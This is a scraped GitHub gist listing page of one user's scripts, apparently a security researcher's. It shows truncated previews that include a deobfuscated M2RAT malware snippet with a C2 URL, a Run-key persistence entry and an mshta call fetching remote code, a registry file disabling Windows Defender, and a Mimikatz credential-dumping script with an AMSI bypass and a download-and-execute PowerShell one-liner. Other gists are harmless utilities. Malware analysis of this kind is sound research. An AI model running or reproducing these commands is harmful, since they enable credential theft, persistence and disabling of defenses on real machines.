Sh1n0g1 Sh1n0g1
Sh1n0g1 / M2RAT.ps1
Last active September 25, 2023 06:03
View M2RAT.ps1
# Deobfuscated M2RAT
# Refer: https://asec.ahnlab.com/en/56857/
Start-Sleep -Seconds 68;
$buffer = 1024 * 1024;
$hostid = $env:COMPUTERNAME + '-' + $env:USERNAME;
$C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid;
$TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw';
if (!(Test-Path $TEMPORARY_FILE)) {
New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force;
}
Sh1n0g1 / shodan-query.ipynb
Last active July 21, 2023 04:52
Shodan Query.ipynb
Sh1n0g1 / youtube-summarizer-with-langchain-chatgpt.ipynb
Last active May 25, 2023 04:15
youtube-summarizer-with-langchain-chatgpt.ipynb
Sh1n0g1 / shinolang.ipynb
Created May 20, 2023 01:29
ShinoLang.ipynb
View DisableWindowsDefender2022.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001
"DisableRealtimeMonitoring"=dword:00000001
"DisableAntiVirus"=dword:00000001
"DisableSpecialRunningModes"=dword:00000001
"DisableRoutinelyTakingAction"=dword:00000001
"ServiceKeepAlive"=dword:00000000
Sh1n0g1 / Invoke-OneShot-Mimikatz.ps1
Last active August 12, 2022 08:08 — forked from pich4ya/Invoke-OneShot-Mimikatz.ps1
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
View Invoke-OneShot-Mimikatz.ps1
# Confirm it works in Windows 10 2022
# Don't download this but execute the next line in command prompt (cmd.exe)
# powershell iex (wget https://gist.githubusercontent.com/Sh1n0g1/b93b48a54276145bd117403a38fd9816/raw/637d7447dc7a99e21cfeec18bec950abbc1bd642/Invoke-OneShot-Mimikatz.ps1).Content
# You will get creds
#
# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021)
# https://payatu.com/blog/arun.nair/amsi-bypass
$code = @"
using System;
Sh1n0g1 / ScreenShot.ps1
Created January 10, 2017 01:27
Take a screenshot by powershell
View ScreenShot.ps1
[Reflection.Assembly]::LoadWithPartialName("System.Drawing")
function screenshot([Drawing.Rectangle]$bounds, $path) {
$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height
$graphics = [Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
$bmp.Save($path)
$graphics.Dispose()
Sh1n0g1 / Get-ActiveTime.ps1
Created August 25, 2017 12:55
Get the active time from Eventlog, login event.
View Get-ActiveTime.ps1
#Initialize
$Weekday=@("Monday","Tuesday","Wednesday","Thursday","Friday","Saturday","Sunday")
$LoginData=@{}
ForEach($w in $Weekday){
$LoginData[$w]=@{}
0..23 | % {$LoginData[$w][$_]=0}
}
#Get the data from Eventlog
$i=0
Sh1n0g1 / ip2geo.py
Created December 21, 2016 01:02
IP2geolocation
View ip2geo.py
#Bulk IP Address 2 Geolocation Using freegeoip.net
#Input: IP Address List
#Output: IP, Latitude, Longitude (CSV Format)
import urllib, json
#Paste your ipaddress list
ips="""
Sh1n0g1 / pefile_peid.py
Created January 25, 2017 11:32
Get the matching result of UserDB.txt(PEid) using pefile
View pefile_peid.py
import sys
import peutils
import pefile
try:
pe = pefile.PE(sys.argv[1])
signatures = peutils.SignatureDatabase('./sig/userdb.txt')
matches = signatures.match_all(pe, ep_only = True)
if type(matches) is list:
for m in matches: